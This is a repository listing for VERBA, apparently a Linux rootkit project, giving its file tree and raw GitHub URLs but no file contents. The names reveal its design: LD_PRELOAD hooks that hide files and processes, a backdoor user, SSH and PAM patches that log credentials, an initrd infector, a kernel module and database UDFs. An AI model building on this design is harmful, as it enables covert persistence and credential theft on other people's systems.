├── .gitattributes ├── LICENSE ├── README.md ├── install.sh ├── pre ├── gen.sh ├── pam_patches │ ├── o_pam_066 │ ├── o_pam_067 │ ├── o_pam_075 │ └── o_pam_151 └── ssh_patches │ ├── o_ssh_411 │ ├── o_ssh_461 │ ├── o_ssh_531 │ ├── o_ssh_582 │ ├── o_ssh_611 │ ├── o_ssh_622 │ ├── o_ssh_691 │ ├── o_ssh_722 │ ├── o_ssh_731 │ ├── o_ssh_751 │ ├── o_ssh_761 │ ├── o_ssh_771 │ ├── o_ssh_781 │ ├── o_ssh_811 │ ├── o_ssh_861 │ ├── s_ssh_531 │ ├── s_ssh_582 │ ├── s_ssh_771 │ └── s_ssh_861 └── src ├── CLIENT └── .keep ├── HORSEPILL ├── horsepill │ ├── horsepill.c │ ├── horsepill.h │ ├── infect.c │ └── infect.h ├── init.diff └── run-init ├── LD ├── LD.c ├── Makefile ├── char_arrays ├── config.h ├── hiding │ ├── evasion │ │ ├── block_strings.c │ │ ├── evasion.c │ │ └── evasion.h │ ├── files │ │ ├── files.h │ │ ├── get_path_gid.c │ │ └── hidden.c │ ├── forge_maps.c │ ├── forge_procnet.c │ ├── hiding.h │ └── reinstall.c ├── hooks │ ├── audit │ │ ├── audit.c │ │ └── audit.h │ ├── authlog │ │ ├── authlog.h │ │ ├── log.c │ │ └── pam_vprompt.c │ ├── dir │ │ ├── chdir.c │ │ ├── dir.h │ │ ├── mkdir.c │ │ ├── opendir.c │ │ ├── readdir.c │ │ └── rmdir.c │ ├── exec │ │ ├── exec.h │ │ ├── execve.c │ │ └── execvp.c │ ├── gid │ │ ├── gid.h │ │ ├── setegid.c │ │ ├── setgid.c │ │ ├── setregid.c │ │ └── setresgid.c │ ├── kill.c │ ├── libdl │ │ ├── dladdr.c │ │ ├── dlinfo.c │ │ ├── dlsym.c │ │ ├── gsym.c │ │ └── libdl.h │ ├── ln │ │ ├── links.h │ │ ├── readlink.c │ │ ├── symlink.c │ │ └── unlink.c │ ├── open │ │ ├── access.c │ │ ├── fopen.c │ │ ├── open.c │ │ └── open.h │ ├── pam │ │ ├── pam.h │ │ ├── pam_hooks.c │ │ ├── pam_private.h │ │ └── pam_syslog.c │ ├── pcap │ │ ├── pcap.c │ │ └── pcap.h │ ├── perms │ │ ├── chmod.c │ │ ├── chown.c │ │ └── perms.h │ ├── ptrace.c │ ├── pwd │ │ ├── pwd.h │ │ ├── pwnam_ent.c │ │ └── pwnam_user.c │ ├── rw │ │ ├── fread.c │ │ ├── fwrite.c │ │ ├── log_ssh.c │ │ ├── read.c │ │ ├── rw.h │ │ └── write.c │ ├── socket.c │ ├── stat │ │ ├── fstat.c │ │ ├── lstat.c │ │ ├── stat.c │ │ └── stat.h │ ├── syslog │ │ ├── syslog.c │ │ └── syslog.h │ └── utmp │ │ ├── getut.c │ │ ├── putut.c │ │ └── utmp.h └── util │ ├── bdusr.c │ ├── processes.c │ ├── util.h │ ├── xor.c │ └── xor_wrappers.h ├── LKM ├── LKM.c ├── Makefile └── config.h ├── LOADER ├── LOADER.c ├── Makefile └── encrypt │ ├── Makefile │ ├── encrypt.c │ └── encrypt.h ├── MYSQL ├── Makefile └── UDF.c ├── PAM └── .keep ├── POSTGRES ├── Makefile └── UDF.c ├── SERVICE ├── init.service └── main.service ├── SSHD └── .keep └── TOOLS ├── elfchngr.c ├── loader.c ├── passgen.c └── skipcpio.c /.gitattributes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/.gitattributes -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/README.md -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/install.sh -------------------------------------------------------------------------------- /pre/gen.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/gen.sh -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_066: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/pam_patches/o_pam_066 -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_067: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/pam_patches/o_pam_067 -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_075: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/pam_patches/o_pam_075 -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_151: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/pam_patches/o_pam_151 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_411: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_411 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_461: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_461 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_531: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_531 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_582: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_582 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_611: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_611 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_622: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_622 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_691: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_691 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_722: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_722 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_731: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_731 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_751: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_751 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_761: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_761 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_771: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_771 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_781: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_781 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_811: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_811 -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_861: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/o_ssh_861 -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_531: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/s_ssh_531 -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_582: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/s_ssh_582 -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_771: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/s_ssh_771 -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_861: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/pre/ssh_patches/s_ssh_861 -------------------------------------------------------------------------------- /src/CLIENT/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/HORSEPILL/horsepill/horsepill.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/HORSEPILL/horsepill/horsepill.c -------------------------------------------------------------------------------- /src/HORSEPILL/horsepill/horsepill.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/HORSEPILL/horsepill/horsepill.h -------------------------------------------------------------------------------- /src/HORSEPILL/horsepill/infect.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/HORSEPILL/horsepill/infect.c -------------------------------------------------------------------------------- /src/HORSEPILL/horsepill/infect.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/HORSEPILL/horsepill/infect.h -------------------------------------------------------------------------------- /src/HORSEPILL/init.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/HORSEPILL/init.diff -------------------------------------------------------------------------------- /src/HORSEPILL/run-init: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/HORSEPILL/run-init -------------------------------------------------------------------------------- /src/LD/LD.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/LD.c -------------------------------------------------------------------------------- /src/LD/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/Makefile -------------------------------------------------------------------------------- /src/LD/char_arrays: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/char_arrays -------------------------------------------------------------------------------- /src/LD/config.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/config.h -------------------------------------------------------------------------------- /src/LD/hiding/evasion/block_strings.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/evasion/block_strings.c -------------------------------------------------------------------------------- /src/LD/hiding/evasion/evasion.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/evasion/evasion.c -------------------------------------------------------------------------------- /src/LD/hiding/evasion/evasion.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/evasion/evasion.h -------------------------------------------------------------------------------- /src/LD/hiding/files/files.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/files/files.h -------------------------------------------------------------------------------- /src/LD/hiding/files/get_path_gid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/files/get_path_gid.c -------------------------------------------------------------------------------- /src/LD/hiding/files/hidden.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/files/hidden.c -------------------------------------------------------------------------------- /src/LD/hiding/forge_maps.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/forge_maps.c -------------------------------------------------------------------------------- /src/LD/hiding/forge_procnet.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/forge_procnet.c -------------------------------------------------------------------------------- /src/LD/hiding/hiding.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/hiding.h -------------------------------------------------------------------------------- /src/LD/hiding/reinstall.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hiding/reinstall.c -------------------------------------------------------------------------------- /src/LD/hooks/audit/audit.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/audit/audit.c -------------------------------------------------------------------------------- /src/LD/hooks/audit/audit.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/audit/audit.h -------------------------------------------------------------------------------- /src/LD/hooks/authlog/authlog.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/authlog/authlog.h -------------------------------------------------------------------------------- /src/LD/hooks/authlog/log.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/authlog/log.c -------------------------------------------------------------------------------- /src/LD/hooks/authlog/pam_vprompt.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/authlog/pam_vprompt.c -------------------------------------------------------------------------------- /src/LD/hooks/dir/chdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/dir/chdir.c -------------------------------------------------------------------------------- /src/LD/hooks/dir/dir.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/dir/dir.h -------------------------------------------------------------------------------- /src/LD/hooks/dir/mkdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/dir/mkdir.c -------------------------------------------------------------------------------- /src/LD/hooks/dir/opendir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/dir/opendir.c -------------------------------------------------------------------------------- /src/LD/hooks/dir/readdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/dir/readdir.c -------------------------------------------------------------------------------- /src/LD/hooks/dir/rmdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/dir/rmdir.c -------------------------------------------------------------------------------- /src/LD/hooks/exec/exec.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/exec/exec.h -------------------------------------------------------------------------------- /src/LD/hooks/exec/execve.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/exec/execve.c -------------------------------------------------------------------------------- /src/LD/hooks/exec/execvp.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/exec/execvp.c -------------------------------------------------------------------------------- /src/LD/hooks/gid/gid.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/gid/gid.h -------------------------------------------------------------------------------- /src/LD/hooks/gid/setegid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/gid/setegid.c -------------------------------------------------------------------------------- /src/LD/hooks/gid/setgid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/gid/setgid.c -------------------------------------------------------------------------------- /src/LD/hooks/gid/setregid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/gid/setregid.c -------------------------------------------------------------------------------- /src/LD/hooks/gid/setresgid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/gid/setresgid.c -------------------------------------------------------------------------------- /src/LD/hooks/kill.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/kill.c -------------------------------------------------------------------------------- /src/LD/hooks/libdl/dladdr.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/libdl/dladdr.c -------------------------------------------------------------------------------- /src/LD/hooks/libdl/dlinfo.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/libdl/dlinfo.c -------------------------------------------------------------------------------- /src/LD/hooks/libdl/dlsym.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/libdl/dlsym.c -------------------------------------------------------------------------------- /src/LD/hooks/libdl/gsym.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/libdl/gsym.c -------------------------------------------------------------------------------- /src/LD/hooks/libdl/libdl.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/libdl/libdl.h -------------------------------------------------------------------------------- /src/LD/hooks/ln/links.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/ln/links.h -------------------------------------------------------------------------------- /src/LD/hooks/ln/readlink.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/ln/readlink.c -------------------------------------------------------------------------------- /src/LD/hooks/ln/symlink.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/ln/symlink.c -------------------------------------------------------------------------------- /src/LD/hooks/ln/unlink.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/ln/unlink.c -------------------------------------------------------------------------------- /src/LD/hooks/open/access.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/open/access.c -------------------------------------------------------------------------------- /src/LD/hooks/open/fopen.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/open/fopen.c -------------------------------------------------------------------------------- /src/LD/hooks/open/open.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/open/open.c -------------------------------------------------------------------------------- /src/LD/hooks/open/open.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/open/open.h -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pam/pam.h -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam_hooks.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pam/pam_hooks.c -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam_private.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pam/pam_private.h -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam_syslog.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pam/pam_syslog.c -------------------------------------------------------------------------------- /src/LD/hooks/pcap/pcap.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pcap/pcap.c -------------------------------------------------------------------------------- /src/LD/hooks/pcap/pcap.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pcap/pcap.h -------------------------------------------------------------------------------- /src/LD/hooks/perms/chmod.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/perms/chmod.c -------------------------------------------------------------------------------- /src/LD/hooks/perms/chown.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/perms/chown.c -------------------------------------------------------------------------------- /src/LD/hooks/perms/perms.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/perms/perms.h -------------------------------------------------------------------------------- /src/LD/hooks/ptrace.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/ptrace.c -------------------------------------------------------------------------------- /src/LD/hooks/pwd/pwd.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pwd/pwd.h -------------------------------------------------------------------------------- /src/LD/hooks/pwd/pwnam_ent.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pwd/pwnam_ent.c -------------------------------------------------------------------------------- /src/LD/hooks/pwd/pwnam_user.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/pwd/pwnam_user.c -------------------------------------------------------------------------------- /src/LD/hooks/rw/fread.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/rw/fread.c -------------------------------------------------------------------------------- /src/LD/hooks/rw/fwrite.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/rw/fwrite.c -------------------------------------------------------------------------------- /src/LD/hooks/rw/log_ssh.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/rw/log_ssh.c -------------------------------------------------------------------------------- /src/LD/hooks/rw/read.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/rw/read.c -------------------------------------------------------------------------------- /src/LD/hooks/rw/rw.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/rw/rw.h -------------------------------------------------------------------------------- /src/LD/hooks/rw/write.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/rw/write.c -------------------------------------------------------------------------------- /src/LD/hooks/socket.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/socket.c -------------------------------------------------------------------------------- /src/LD/hooks/stat/fstat.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/stat/fstat.c -------------------------------------------------------------------------------- /src/LD/hooks/stat/lstat.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/stat/lstat.c -------------------------------------------------------------------------------- /src/LD/hooks/stat/stat.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/stat/stat.c -------------------------------------------------------------------------------- /src/LD/hooks/stat/stat.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/stat/stat.h -------------------------------------------------------------------------------- /src/LD/hooks/syslog/syslog.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/syslog/syslog.c -------------------------------------------------------------------------------- /src/LD/hooks/syslog/syslog.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/syslog/syslog.h -------------------------------------------------------------------------------- /src/LD/hooks/utmp/getut.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/utmp/getut.c -------------------------------------------------------------------------------- /src/LD/hooks/utmp/putut.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/utmp/putut.c -------------------------------------------------------------------------------- /src/LD/hooks/utmp/utmp.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/hooks/utmp/utmp.h -------------------------------------------------------------------------------- /src/LD/util/bdusr.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/util/bdusr.c -------------------------------------------------------------------------------- /src/LD/util/processes.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/util/processes.c -------------------------------------------------------------------------------- /src/LD/util/util.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/util/util.h -------------------------------------------------------------------------------- /src/LD/util/xor.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/util/xor.c -------------------------------------------------------------------------------- /src/LD/util/xor_wrappers.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LD/util/xor_wrappers.h -------------------------------------------------------------------------------- /src/LKM/LKM.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LKM/LKM.c -------------------------------------------------------------------------------- /src/LKM/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LKM/Makefile -------------------------------------------------------------------------------- /src/LKM/config.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LKM/config.h -------------------------------------------------------------------------------- /src/LOADER/LOADER.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LOADER/LOADER.c -------------------------------------------------------------------------------- /src/LOADER/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LOADER/Makefile -------------------------------------------------------------------------------- /src/LOADER/encrypt/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LOADER/encrypt/Makefile -------------------------------------------------------------------------------- /src/LOADER/encrypt/encrypt.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LOADER/encrypt/encrypt.c -------------------------------------------------------------------------------- /src/LOADER/encrypt/encrypt.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/LOADER/encrypt/encrypt.h -------------------------------------------------------------------------------- /src/MYSQL/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/MYSQL/Makefile -------------------------------------------------------------------------------- /src/MYSQL/UDF.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/MYSQL/UDF.c -------------------------------------------------------------------------------- /src/PAM/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/POSTGRES/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/POSTGRES/Makefile -------------------------------------------------------------------------------- /src/POSTGRES/UDF.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/POSTGRES/UDF.c -------------------------------------------------------------------------------- /src/SERVICE/init.service: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/SERVICE/init.service -------------------------------------------------------------------------------- /src/SERVICE/main.service: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/SERVICE/main.service -------------------------------------------------------------------------------- /src/SSHD/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/TOOLS/elfchngr.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/TOOLS/elfchngr.c -------------------------------------------------------------------------------- /src/TOOLS/loader.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/TOOLS/loader.c -------------------------------------------------------------------------------- /src/TOOLS/passgen.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/TOOLS/passgen.c -------------------------------------------------------------------------------- /src/TOOLS/skipcpio.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/HEAD/src/TOOLS/skipcpio.c --------------------------------------------------------------------------------